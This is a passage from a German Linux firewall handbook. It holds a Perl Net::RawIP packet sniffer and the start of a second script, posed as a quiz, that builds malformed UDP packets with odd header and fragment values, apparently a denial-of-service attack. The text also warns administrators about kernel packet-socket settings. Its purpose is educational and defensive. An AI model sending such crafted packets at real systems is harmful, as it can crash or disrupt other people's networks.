Firewall Handbuch für LINUX 2.0 und 2.2 - zurück

Erstellt von Doc Gonzo - http://kickme.to/plugins
loop $pcap,$opt_n,\,\@a;
}
else {
$b = new Net::RawIP;
my $pcap = $b->pcapinit($device,$filter1,$psize,$timeout);
loop $pcap,$opt_n,\,\@a;
}
sub cl {
$a->bset(substr( $_[2],14));
my @fl = $a->get({tcp=>
[qw(psh syn fin rst urg ack)]
});
print "Client -> ";
map { print "$flags[$_] " if $fl[$_] } (0..5);
print "\n"
}
sub sv {
$b->bset(substr( $_[2],14));
my @fl = $b->get({tcp=>
[qw(psh syn fin rst urg ack)]
});
print "Server -> ";
map { print "$flags[$_] " if $fl[$_] } (0..5);
print "\n";
}
Das folgende Beispiel funktioniert eventuell auf einigen UNIX'en nicht, darunter LINUX 2.2
und BSD UNIX'e. Der Grund ist folgender: Die Distributoren haben sich darauf geeinigt,
daß der Schaden von irgendwelchen Lamern groß genug sei. Im Kernel von UNIX, LINUX
2.2, NT und Windows 95/98 Service Packs wurde also ein Prüfsummencheck eingebaut,
der verhindert, daß solche bösartigen Pakete die Netzwerkkarte/ISDN Karte verlassen.
Unter LINUX müssen Sie im Kernel den direkten Zugriff auf das Netzwerkdevice im Kernel
aktivieren: Config Paket Socket=Y, Config Netlink Socket=Y. Damit haben dann sogar
einfache User direkten Zugriff auf die Netzwerkkarte....Systemadministratoren also
aufgepasst ! Diese Option sollte man stets deaktiviert haben, ansonsten können Nutzer
von CGI-BIN's von Ihrem WWW-Server aus diese Angriffe ausführen....was sicher zu
Ärger führt...
Bei dem folgenden Beispiel dürfen Sie nun selber raten, welcher Angriff hier ausgeführt
wird. Beachten Sie hierzu die Möglichkeiten, die saddr zu verändern und die TCP/IP Flags
zu variieren.....
#!/usr/bin/perl
require 'getopts.pl';
use Net::RawIP;
Getopts('t:n:');
die "Usage $0 -t -n " unless ($opt_t && $opt_n);
@data = split (//,"0"x20);
$p = new Net::RawIP({
ip => {
ihl => 11,
tot_len => 44,
tos => 0,
ttl => 255,
id => 1999,
frag_off => 16383,
protocol => 17,